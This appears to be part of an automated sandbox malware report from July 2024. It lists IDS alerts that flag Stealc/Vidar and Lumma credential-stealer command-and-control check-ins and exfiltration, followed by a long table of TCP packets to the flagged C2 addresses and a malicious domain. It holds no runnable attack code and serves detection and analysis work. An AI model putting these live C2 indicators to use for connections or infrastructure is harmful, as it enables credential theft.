2024-07-26T18:57:32.629147+0200	TCP	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	443	49785	65.108.151.108	192.168.2.4
2024-07-26T18:57:35.017623+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49787	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:26.038488+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49750	443	192.168.2.4	5.75.212.60
2024-07-26T18:57:01.455032+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49771	20.114.59.183	192.168.2.4
2024-07-26T18:56:22.457448+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49743	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:51.977256+0200	UDP	2054593	ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop)	54843	53	192.168.2.4	1.1.1.1
2024-07-26T18:56:21.739203+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49742	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:30.595698+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49753	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:56.592055+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49765	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:12.338085+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49735	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:37.491422+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49756	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:13.006441+0200	TCP	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	443	49735	5.75.212.60	192.168.2.4
2024-07-26T18:56:19.249685+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49739	443	192.168.2.4	5.75.212.60
2024-07-26T18:57:00.351636+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49770	443	192.168.2.4	172.67.213.85
2024-07-26T18:57:28.969307+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49783	443	192.168.2.4	65.108.151.108
2024-07-26T18:57:31.171758+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	443	49784	65.108.151.108	192.168.2.4
2024-07-26T18:56:58.902651+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49769	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:53.536905+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49761	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:52.013021+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49759	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:11.009544+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49734	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:54.881709+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49764	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:11.676767+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	49734	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:22.767321+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49741	20.114.59.183	192.168.2.4
2024-07-26T18:57:04.582395+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49773	443	192.168.2.4	172.67.213.85
2024-07-26T18:57:38.356607+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49788	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:15.155014+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49737	443	192.168.2.4	5.75.212.60
2024-07-26T18:57:33.442894+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49786	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:54.266851+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49762	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:54.810885+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49763	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:58.693631+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49768	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:53.263672+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49760	443	192.168.2.4	172.67.213.85
2024-07-26T18:57:39.163321+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49789	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:08.252042+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49732	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:29.211959+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49752	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:07.064232+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49731	443	192.168.2.4	5.75.212.60
2024-07-26T18:57:26.272231+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49781	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:33.853485+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49754	443	192.168.2.4	5.75.212.60
2024-07-26T18:57:31.880500+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49785	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:09.633690+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49733	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:59.232158+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49768	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:17.210237+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	49737	5.75.212.60	192.168.2.4
2024-07-26T18:56:27.655634+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49751	443	192.168.2.4	5.75.212.60
2024-07-26T18:57:30.417858+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49784	443	192.168.2.4	65.108.151.108
2024-07-26T18:57:03.549501+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49773	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:10.289089+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	49733	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:25.309530+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	49747	5.75.212.60	192.168.2.4
2024-07-26T18:57:27.510944+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49782	443	192.168.2.4	65.108.151.108
2024-07-26T18:56:56.930642+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49766	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:18.375938+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49738	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:24.206359+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49747	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:13.006417+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	49735	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:35.076390+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49755	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:11.677300+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	443	49734	5.75.212.60	192.168.2.4
2024-07-26T18:56:13.775957+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49736	443	192.168.2.4	5.75.212.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 18:55:58.282102108 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 26, 2024 18:56:04.254400015 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:04.254437923 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:04.254914045 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:04.264863968 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:04.264877081 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:04.968266010 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:04.968497992 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.142416000 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.142441034 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.143460989 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.143651009 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.150085926 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.196501017 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.832464933 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.832556963 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.832561970 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.832586050 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.832628965 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.832679033 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.832679033 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.832679033 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.832693100 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.832781076 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.921144962 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.921197891 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.921278000 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.921278000 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.921292067 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.921380997 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.947504997 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.947554111 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.947678089 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:05.947724104 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.947724104 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.947724104 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.993223906 CEST	49730	443	192.168.2.4	23.199.218.33
Jul 26, 2024 18:56:05.993246078 CEST	443	49730	23.199.218.33	192.168.2.4
Jul 26, 2024 18:56:06.104012966 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:06.104049921 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:06.104125023 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:06.104424000 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:06.104439974 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.064094067 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.064232111 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.069088936 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.069097042 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.069565058 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.069650888 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.069983959 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.116532087 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.515928984 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.516145945 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.516146898 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.516212940 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.519002914 CEST	49731	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.519011021 CEST	443	49731	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.521634102 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.521677017 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.521852970 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.522078991 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:07.522109032 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:07.891391993 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 26, 2024 18:56:08.251948118 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.252042055 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.252842903 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.252850056 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.254576921 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.254584074 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.892343998 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.892494917 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.892528057 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.892558098 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.892582893 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.892600060 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.895473957 CEST	49732	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.895493031 CEST	443	49732	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.897082090 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.897111893 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:08.897180080 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.897387981 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:08.897402048 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:09.633548975 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:09.633690119 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:09.707366943 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:09.707374096 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:09.722615957 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:09.722625971 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.289150000 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.289211988 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.289263964 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.289283037 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.289293051 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.289338112 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.289366007 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.289422989 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.289648056 CEST	49733	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.289659023 CEST	443	49733	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.291505098 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.291518927 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:10.291591883 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.291804075 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:10.291817904 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.009412050 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.009543896 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.010067940 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.010077000 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.013024092 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.013030052 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.676867962 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.676929951 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.676996946 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.677021980 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.677038908 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.677076101 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.677089930 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.677133083 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.677531004 CEST	49734	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.677542925 CEST	443	49734	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.679054976 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.679092884 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:11.679182053 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.679364920 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:11.679380894 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:12.337886095 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:12.338084936 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:12.338963985 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:12.338982105 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:12.340797901 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:12.340806007 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.006215096 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.006289005 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.006357908 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.006417990 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.006669998 CEST	49735	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.006712914 CEST	443	49735	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.075623035 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.075681925 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.075773954 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.075978041 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.075999022 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.775795937 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.775957108 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.776705980 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.776715994 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.778779030 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.778784990 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:13.778844118 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:13.778853893 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:14.064142942 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:14.064188957 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:14.064280033 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:14.064616919 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:14.064634085 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:14.509521961 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:14.509593010 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:14.509624004 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:14.509653091 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:14.510996103 CEST	49736	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:14.511018038 CEST	443	49736	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.154911041 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.155014038 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.155555964 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.155566931 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.157696009 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.157701969 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.603761911 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.603800058 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.603820086 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.603849888 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.603889942 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.603904963 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.603955030 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.628601074 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.628629923 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.628690958 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.628707886 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:15.628720999 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:15.628751040 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.037849903 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.037899971 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.037946939 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.037965059 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.037998915 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.038017988 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.046830893 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.046884060 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.046907902 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.046921968 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.046937943 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.046961069 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.061609983 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.061656952 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.061698914 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.061709881 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.061779022 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.061779022 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.072419882 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.072463989 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.072498083 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.072504044 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.072590113 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.072591066 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.081382990 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.081404924 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.081480026 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.081485987 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.081525087 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.091171026 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.091214895 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.091252089 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.091257095 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.091418982 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.091418982 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.096745014 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.096766949 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.096849918 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.096856117 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.096913099 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.104028940 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.104049921 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.104115009 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.104120970 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.104160070 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.112539053 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.112581015 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.112627029 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.112634897 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.112665892 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.112688065 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.118654013 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.118695974 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.118745089 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.118752003 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.118777037 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.118793964 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.125005007 CEST	443	49737	5.75.212.60	192.168.2.4
